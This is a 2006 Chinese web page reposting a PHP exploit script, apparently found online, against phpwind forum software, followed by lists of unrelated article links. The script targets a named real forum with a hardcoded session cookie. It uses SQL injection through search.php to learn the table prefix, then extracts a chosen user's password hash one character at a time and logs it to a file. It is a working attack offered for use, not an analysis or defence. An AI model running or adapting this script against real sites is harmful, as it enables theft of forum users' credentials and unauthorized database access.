从网上搜到的phpwind 0day的代码


Posted in PHP onDecember 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploiet Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo "<br>Done!We Post $count times!<br>";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>

PHP 相关文章推荐
模拟OICQ的实现思路和核心程序(二)
Oct 09 PHP
《PHP编程最快明白》第二讲 数字、浮点、布尔型、字符串和数组
Nov 01 PHP
上传文件先创建目录 再上传到目录里面去
Dec 29 PHP
php中使用DOM类读取XML文件的实现代码
Dec 14 PHP
php给一组指定关键词添加span标签的方法
Mar 31 PHP
PHP的Yii框架中使用数据库的配置和SQL操作实例教程
Mar 17 PHP
CI框架中数据库操作函数$this-&gt;db-&gt;where()相关用法总结
May 17 PHP
Laravel4中的Validator验证扩展用法详解
Jul 26 PHP
Laravel最佳分割路由文件(routes.php)的方式
Aug 04 PHP
php is_executable判断给定文件名是否可执行实例
Sep 26 PHP
PHP使用递归按层级查找数据的方法
Nov 10 PHP
PHP http请求超时问题解决方案
Nov 13 PHP
ajax缓存问题解决途径
Dec 06 #PHP
数字转英文
Dec 06 #PHP
?生?D片??C字串
Dec 06 #PHP
?算你??的 PHP 程式大小
Dec 06 #PHP
PHP中,文件上传
Dec 06 #PHP
eWebEditor v3.8 商业完整版 (PHP)
Dec 06 #PHP
实现 win2003 下 mysql 数据库每天自动备份
Dec 06 #PHP
You might like
PHP 处理图片的类实现代码
2009/10/23 PHP
PHP下的Oracle客户端扩展(OCI8)安装教程
2014/09/10 PHP
php实现生成code128条形码的方法详解
2017/07/19 PHP
PHP基于GD2函数库实现验证码功能示例
2019/01/27 PHP
tp5(thinkPHP5框架)captcha验证码配置及验证操作示例
2019/05/28 PHP
【消息提示组件】,兼容IE6/7&amp;&amp;FF2
2007/09/04 Javascript
JQuery上传插件Uploadify使用详解及错误处理
2010/04/27 Javascript
Javascript变量函数浅析
2011/09/02 Javascript
jQuery+PHP实现动态数字展示特效
2015/03/14 Javascript
jQuery form插件的使用之处理server返回的JSON, XML,HTML数据
2016/01/26 Javascript
整理关于Bootstrap警示框的慕课笔记
2017/03/29 Javascript
bootstrap datepicker插件默认英文修改为中文
2017/07/28 Javascript
AngularJs+Bootstrap实现漂亮的计算器
2017/08/10 Javascript
three.js实现3D视野缩放效果
2017/11/16 Javascript
JavaScript 日期时间选择器一些小结
2018/04/02 Javascript
详解如何在vue项目中使用eslint+prettier格式化代码
2018/11/10 Javascript
Vue.js计算机属性computed和methods方法详解
2019/10/12 Javascript
python文件比较示例分享
2014/01/10 Python
在Python中处理日期和时间的基本知识点整理汇总
2015/05/22 Python
举例讲解Python中的list列表数据结构用法
2016/03/12 Python
Python打包可执行文件的方法详解
2016/09/19 Python
Django自定义分页与bootstrap分页结合
2021/02/22 Python
python中urlparse模块介绍与使用示例
2017/11/19 Python
安装python及pycharm的教程图解
2019/10/10 Python
Python3常见函数range()用法详解
2019/12/30 Python
flask框架渲染Jinja模板与传入模板变量操作详解
2020/01/25 Python
CSS3盒子模型详解
2013/04/24 HTML / CSS
HTML5 Canvas入门学习教程
2016/03/17 HTML / CSS
英国户外服装品牌:Craghoppers
2019/04/25 全球购物
J2EE中常用的名词进行解释
2015/11/09 面试题
贯彻学习两会心得体会范文
2014/03/17 职场文书
文明村镇申报材料
2014/05/06 职场文书
家庭教育的心得体会
2014/09/01 职场文书
男人帮观后感
2015/06/18 职场文书
休学证明范本
2015/06/19 职场文书
Python趣味挑战之实现简易版音乐播放器
2021/05/28 Python